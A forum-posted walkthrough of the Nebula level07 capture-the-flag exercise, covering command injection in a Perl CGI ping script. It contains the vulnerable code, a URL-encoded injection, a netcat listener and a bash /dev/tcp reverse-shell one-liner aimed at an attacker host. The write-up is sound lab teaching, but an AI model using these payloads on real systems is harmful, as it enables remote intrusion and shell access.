How to pwned Nebula : level07 - Command Injection CGI script

Exploit-Exercice : Nebula


Level07 - Command injection

Here what we can find on exploit-exercice

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.

They also provide the source code

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");
  
}

# check if Host set. if not, display normal page, etc

ping(param("Host"));

The weakness of this program is this line

@output = `ping -c 3 $host 2>&1`;

if we control the variable host we can inject command and get a shell

so let’s try to take “hack” this program

We can run the index.cgi with perl like this

the Host=localhost set the parameter to localhost

Let’s try to inject a command

You can see that this script is run as level07. This is not what we want, let’s read the thttpd.conf

This is interesting a server run on port 7007

Now I will show you a method to get a reverse shell

Web Browser attack

Open kali linux and go to http://nebula_ip:7007/index.cgi?Host=localhost

You will see the result of the ping in your web browser
Well if we run our command like this http://nebula_ip:7007/index.cgi?Host=localhost; id ? will it work ?

What ? no output of id command ?

So let’s try to encode the “;”
http://nebula_ip:7007/index.cgi?Host=localhost%3Bid

Yes ! the command are executed as flag07 ! But now I want a shell !

On my kali linux machine I run

nc -lvp 8888

To have a reverse shell you can run

bash -i >& /dev/tcp/kali_linux_ip/8888 0>&1

encode it and you will have
http://nebula_ip:7007/index.cgi?Host=localhost%3Bbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fkali_linux_ip%2F8888%200%3E%261

if we visit the link and wait

You get a shell ! :slight_smile: Well done Hacker ! You’ll be ready for level08

This topic was automatically closed after 30 days. New replies are no longer allowed.